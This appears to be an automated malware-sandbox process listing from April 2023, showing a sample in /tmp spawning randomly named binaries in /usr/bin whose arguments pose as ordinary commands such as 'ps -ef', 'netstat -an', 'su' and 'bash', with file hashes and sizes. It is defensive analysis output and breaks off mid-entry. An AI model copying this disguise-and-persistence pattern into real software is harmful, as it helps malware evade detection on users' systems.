                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:55:19
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:55:19
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/hazvgjwinh
                                                        Arguments:/usr/bin/hazvgjwinh "ps -ef" 9452
                                                        File size:548660 bytes
                                                        MD5 hash:43229f935005fa2b1516f2146006cbc3

                                                        Start time:19:55:19
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/hazvgjwinh
                                                        Arguments:n/a
                                                        File size:548660 bytes
                                                        MD5 hash:43229f935005fa2b1516f2146006cbc3

                                                        Start time:19:55:19
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:55:19
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:55:19
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/hazvgjwinh
                                                        Arguments:/usr/bin/hazvgjwinh "route -n" 9452
                                                        File size:548660 bytes
                                                        MD5 hash:43229f935005fa2b1516f2146006cbc3

                                                        Start time:19:55:19
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/hazvgjwinh
                                                        Arguments:n/a
                                                        File size:548660 bytes
                                                        MD5 hash:43229f935005fa2b1516f2146006cbc3

                                                        Start time:19:55:19
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:55:19
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:55:19
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/hazvgjwinh
                                                        Arguments:/usr/bin/hazvgjwinh bash 9452
                                                        File size:548660 bytes
                                                        MD5 hash:43229f935005fa2b1516f2146006cbc3

                                                        Start time:19:55:19
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/hazvgjwinh
                                                        Arguments:n/a
                                                        File size:548660 bytes
                                                        MD5 hash:43229f935005fa2b1516f2146006cbc3

                                                        Start time:19:55:19
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:55:19
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:55:19
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/hazvgjwinh
                                                        Arguments:/usr/bin/hazvgjwinh id 9452
                                                        File size:548660 bytes
                                                        MD5 hash:43229f935005fa2b1516f2146006cbc3

                                                        Start time:19:55:19
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/hazvgjwinh
                                                        Arguments:n/a
                                                        File size:548660 bytes
                                                        MD5 hash:43229f935005fa2b1516f2146006cbc3

                                                        Start time:19:55:19
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:55:19
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:55:19
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/hazvgjwinh
                                                        Arguments:/usr/bin/hazvgjwinh "ps -ef" 9452
                                                        File size:548660 bytes
                                                        MD5 hash:43229f935005fa2b1516f2146006cbc3

                                                        Start time:19:55:19
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/hazvgjwinh
                                                        Arguments:n/a
                                                        File size:548660 bytes
                                                        MD5 hash:43229f935005fa2b1516f2146006cbc3

                                                        Start time:19:55:24
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:55:24
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:55:24
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/uriorqqkrk
                                                        Arguments:/usr/bin/uriorqqkrk "cd /etc" 9452
                                                        File size:548660 bytes
                                                        MD5 hash:34adf7e33544d8fee3b2e089260b1273

                                                        Start time:19:55:24
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/uriorqqkrk
                                                        Arguments:n/a
                                                        File size:548660 bytes
                                                        MD5 hash:34adf7e33544d8fee3b2e089260b1273

                                                        Start time:19:55:24
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:55:24
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:55:24
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/uriorqqkrk
                                                        Arguments:/usr/bin/uriorqqkrk top 9452
                                                        File size:548660 bytes
                                                        MD5 hash:34adf7e33544d8fee3b2e089260b1273

                                                        Start time:19:55:24
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/uriorqqkrk
                                                        Arguments:n/a
                                                        File size:548660 bytes
                                                        MD5 hash:34adf7e33544d8fee3b2e089260b1273

                                                        Start time:19:55:24
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:55:24
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:55:24
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/uriorqqkrk
                                                        Arguments:/usr/bin/uriorqqkrk pwd 9452
                                                        File size:548660 bytes
                                                        MD5 hash:34adf7e33544d8fee3b2e089260b1273

                                                        Start time:19:55:24
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/uriorqqkrk
                                                        Arguments:n/a
                                                        File size:548660 bytes
                                                        MD5 hash:34adf7e33544d8fee3b2e089260b1273

                                                        Start time:19:55:24
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:55:24
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:55:24
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/uriorqqkrk
                                                        Arguments:/usr/bin/uriorqqkrk "grep \"A\"" 9452
                                                        File size:548660 bytes
                                                        MD5 hash:34adf7e33544d8fee3b2e089260b1273

                                                        Start time:19:55:24
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/uriorqqkrk
                                                        Arguments:n/a
                                                        File size:548660 bytes
                                                        MD5 hash:34adf7e33544d8fee3b2e089260b1273

                                                        Start time:19:55:24
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:55:24
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:55:24
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/uriorqqkrk
                                                        Arguments:/usr/bin/uriorqqkrk id 9452
                                                        File size:548660 bytes
                                                        MD5 hash:34adf7e33544d8fee3b2e089260b1273

                                                        Start time:19:55:24
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/uriorqqkrk
                                                        Arguments:n/a
                                                        File size:548660 bytes
                                                        MD5 hash:34adf7e33544d8fee3b2e089260b1273

                                                        Start time:19:55:29
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:55:29
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:55:29
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/tchbigxomm
                                                        Arguments:/usr/bin/tchbigxomm id 9452
                                                        File size:548660 bytes
                                                        MD5 hash:c0397b437f94080dbd9ec7afe1846ad2

                                                        Start time:19:55:29
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/tchbigxomm
                                                        Arguments:n/a
                                                        File size:548660 bytes
                                                        MD5 hash:c0397b437f94080dbd9ec7afe1846ad2

                                                        Start time:19:55:29
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:55:29
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:55:29
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/tchbigxomm
                                                        Arguments:/usr/bin/tchbigxomm "netstat -an" 9452
                                                        File size:548660 bytes
                                                        MD5 hash:c0397b437f94080dbd9ec7afe1846ad2

                                                        Start time:19:55:29
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/tchbigxomm
                                                        Arguments:n/a
                                                        File size:548660 bytes
                                                        MD5 hash:c0397b437f94080dbd9ec7afe1846ad2

                                                        Start time:19:55:29
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:55:29
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:55:29
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/tchbigxomm
                                                        Arguments:/usr/bin/tchbigxomm "grep \"A\"" 9452
                                                        File size:548660 bytes
                                                        MD5 hash:c0397b437f94080dbd9ec7afe1846ad2

                                                        Start time:19:55:29
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/tchbigxomm
                                                        Arguments:n/a
                                                        File size:548660 bytes
                                                        MD5 hash:c0397b437f94080dbd9ec7afe1846ad2

                                                        Start time:19:55:29
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:55:29
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:55:29
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/tchbigxomm
                                                        Arguments:/usr/bin/tchbigxomm pwd 9452
                                                        File size:548660 bytes
                                                        MD5 hash:c0397b437f94080dbd9ec7afe1846ad2

                                                        Start time:19:55:29
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/tchbigxomm
                                                        Arguments:n/a
                                                        File size:548660 bytes
                                                        MD5 hash:c0397b437f94080dbd9ec7afe1846ad2

                                                        Start time:19:55:29
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:55:29
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:55:29
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/tchbigxomm
                                                        Arguments:/usr/bin/tchbigxomm "netstat -an" 9452
                                                        File size:548660 bytes
                                                        MD5 hash:c0397b437f94080dbd9ec7afe1846ad2

                                                        Start time:19:55:29
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/tchbigxomm
                                                        Arguments:n/a
                                                        File size:548660 bytes
                                                        MD5 hash:c0397b437f94080dbd9ec7afe1846ad2

                                                        Start time:19:55:34
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:55:34
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:55:34
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/inquziyqfh
                                                        Arguments:/usr/bin/inquziyqfh "ifconfig eth0" 9452
                                                        File size:548671 bytes
                                                        MD5 hash:c5240c03174adc647b14472a80726172

                                                        Start time:19:55:34
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/inquziyqfh
                                                        Arguments:n/a
                                                        File size:548671 bytes
                                                        MD5 hash:c5240c03174adc647b14472a80726172

                                                        Start time:19:55:34
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:55:34
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:55:34
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/inquziyqfh
                                                        Arguments:/usr/bin/inquziyqfh id 9452
                                                        File size:548671 bytes
                                                        MD5 hash:c5240c03174adc647b14472a80726172

                                                        Start time:19:55:34
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/inquziyqfh
                                                        Arguments:n/a
                                                        File size:548671 bytes
                                                        MD5 hash:c5240c03174adc647b14472a80726172

                                                        Start time:19:55:34
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:55:34
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:55:34
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/inquziyqfh
                                                        Arguments:/usr/bin/inquziyqfh ls 9452
                                                        File size:548671 bytes
                                                        MD5 hash:c5240c03174adc647b14472a80726172

                                                        Start time:19:55:34
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/inquziyqfh
                                                        Arguments:n/a
                                                        File size:548671 bytes
                                                        MD5 hash:c5240c03174adc647b14472a80726172

                                                        Start time:19:55:34
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:55:34
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:55:34
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/inquziyqfh
                                                        Arguments:/usr/bin/inquziyqfh su 9452
                                                        File size:548671 bytes
                                                        MD5 hash:c5240c03174adc647b14472a80726172

                                                        Start time:19:55:34
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/inquziyqfh
                                                        Arguments:n/a
                                                        File size:548671 bytes
                                                        MD5 hash:c5240c03174adc647b14472a80726172

                                                        Start time:19:55:34
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:55:34
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:55:34
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/inquziyqfh
                                                        Arguments:/usr/bin/inquziyqfh top 9452
                                                        File size:548671 bytes
                                                        MD5 hash:c5240c03174adc647b14472a80726172

                                                        Start time:19:55:34
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/inquziyqfh
                                                        Arguments:n/a
                                                        File size:548671 bytes
                                                        MD5 hash:c5240c03174adc647b14472a80726172

                                                        Start time:19:55:39
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:55:39
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:55:39
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/hzocakrfjc
                                                        Arguments:/usr/bin/hzocakrfjc bash 9452
                                                        File size:548660 bytes
                                                        MD5 hash:2493ae71a6b7a72f3c38d4e611f4a5e1

                                                        Start time:19:55:39
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/hzocakrfjc
                                                        Arguments:n/a
                                                        File size:548660 bytes
                                                        MD5 hash:2493ae71a6b7a72f3c38d4e611f4a5e1

                                                        Start time:19:55:39
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:55:39
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:55:39
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/hzocakrfjc
                                                        Arguments:/usr/bin/hzocakrfjc whoami 9452
                                                        File size:548660 bytes
                                                        MD5 hash:2493ae71a6b7a72f3c38d4e611f4a5e1

                                                        Start time:19:55:39
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/hzocakrfjc
                                                        Arguments:n/a
                                                        File size:548660 bytes
                                                        MD5 hash:2493ae71a6b7a72f3c38d4e611f4a5e1

                                                        Start time:19:55:39
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:55:39
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:55:39
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/hzocakrfjc
                                                        Arguments:/usr/bin/hzocakrfjc gnome-terminal 9452
                                                        File size:548660 bytes
                                                        MD5 hash:2493ae71a6b7a72f3c38d4e611f4a5e1

                                                        Start time:19:55:39
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/hzocakrfjc
                                                        Arguments:n/a
                                                        File size:548660 bytes
                                                        MD5 hash:2493ae71a6b7a72f3c38d4e611f4a5e1

                                                        Start time:19:55:39
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:55:39
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:55:39
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/hzocakrfjc
                                                        Arguments:/usr/bin/hzocakrfjc "ps -ef" 9452
                                                        File size:548660 bytes
                                                        MD5 hash:2493ae71a6b7a72f3c38d4e611f4a5e1

                                                        Start time:19:55:39
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/hzocakrfjc
                                                        Arguments:n/a
                                                        File size:548660 bytes
                                                        MD5 hash:2493ae71a6b7a72f3c38d4e611f4a5e1

                                                        Start time:19:55:39
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:55:39
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:55:39
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/hzocakrfjc
                                                        Arguments:/usr/bin/hzocakrfjc "netstat -antop" 9452
                                                        File size:548660 bytes
                                                        MD5 hash:2493ae71a6b7a72f3c38d4e611f4a5e1

                                                        Start time:19:55:39
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/hzocakrfjc
                                                        Arguments:n/a
                                                        File size:548660 bytes
                                                        MD5 hash:2493ae71a6b7a72f3c38d4e611f4a5e1

                                                        Start time:19:55:44
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:55:44
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:55:44
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/eyvooyilzg
                                                        Arguments:/usr/bin/eyvooyilzg "grep \"A\"" 9452
                                                        File size:548682 bytes
                                                        MD5 hash:b3c0433cb96af4d84583a4cb9814d55d

                                                        Start time:19:55:44
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/eyvooyilzg
                                                        Arguments:n/a
                                                        File size:548682 bytes
                                                        MD5 hash:b3c0433cb96af4d84583a4cb9814d55d

                                                        Start time:19:55:44
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:55:44
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:55:44
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/eyvooyilzg
                                                        Arguments:/usr/bin/eyvooyilzg uptime 9452
                                                        File size:548682 bytes
                                                        MD5 hash:b3c0433cb96af4d84583a4cb9814d55d

                                                        Start time:19:55:44
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/eyvooyilzg
                                                        Arguments:n/a
                                                        File size:548682 bytes
                                                        MD5 hash:b3c0433cb96af4d84583a4cb9814d55d

                                                        Start time:19:55:44
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:55:44
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:55:44
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/eyvooyilzg
                                                        Arguments:/usr/bin/eyvooyilzg "cd /etc" 9452
                                                        File size:548682 bytes
                                                        MD5 hash:b3c0433cb96af4d84583a4cb9814d55d

                                                        Start time:19:55:44
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/eyvooyilzg
                                                        Arguments:n/a
                                                        File size:548682 bytes
                                                        MD5 hash:b3c0433cb96af4d84583a4cb9814d55d

                                                        Start time:19:55:44
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:55:44
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:55:44
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/eyvooyilzg
                                                        Arguments:/usr/bin/eyvooyilzg pwd 9452
                                                        File size:548682 bytes
                                                        MD5 hash:b3c0433cb96af4d84583a4cb9814d55d

                                                        Start time:19:55:44
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/eyvooyilzg
                                                        Arguments:n/a
                                                        File size:548682 bytes
                                                        MD5 hash:b3c0433cb96af4d84583a4cb9814d55d

                                                        Start time:19:55:44
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:55:44
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:55:44
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/eyvooyilzg
                                                        Arguments:/usr/bin/eyvooyilzg "route -n" 9452
                                                        File size:548682 bytes
                                                        MD5 hash:b3c0433cb96af4d84583a4cb9814d55d

                                                        Start time:19:55:44
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/eyvooyilzg
                                                        Arguments:n/a
                                                        File size:548682 bytes
                                                        MD5 hash:b3c0433cb96af4d84583a4cb9814d55d

                                                        Start time:19:55:49
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:55:49
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:55:49
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/yklepkdsai
                                                        Arguments:/usr/bin/yklepkdsai "netstat -an" 9452
                                                        File size:548682 bytes
                                                        MD5 hash:77fa98c6c1de36087a4437c1b6aeb7ef

                                                        Start time:19:55:49
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/yklepkdsai
                                                        Arguments:n/a
                                                        File size:548682 bytes
                                                        MD5 hash:77fa98c6c1de36087a4437c1b6aeb7ef

                                                        Start time:19:55:49
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:55:49
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:55:49
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/yklepkdsai
                                                        Arguments:/usr/bin/yklepkdsai whoami 9452
                                                        File size:548682 bytes
                                                        MD5 hash:77fa98c6c1de36087a4437c1b6aeb7ef

                                                        Start time:19:55:49
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/yklepkdsai
                                                        Arguments:n/a
                                                        File size:548682 bytes
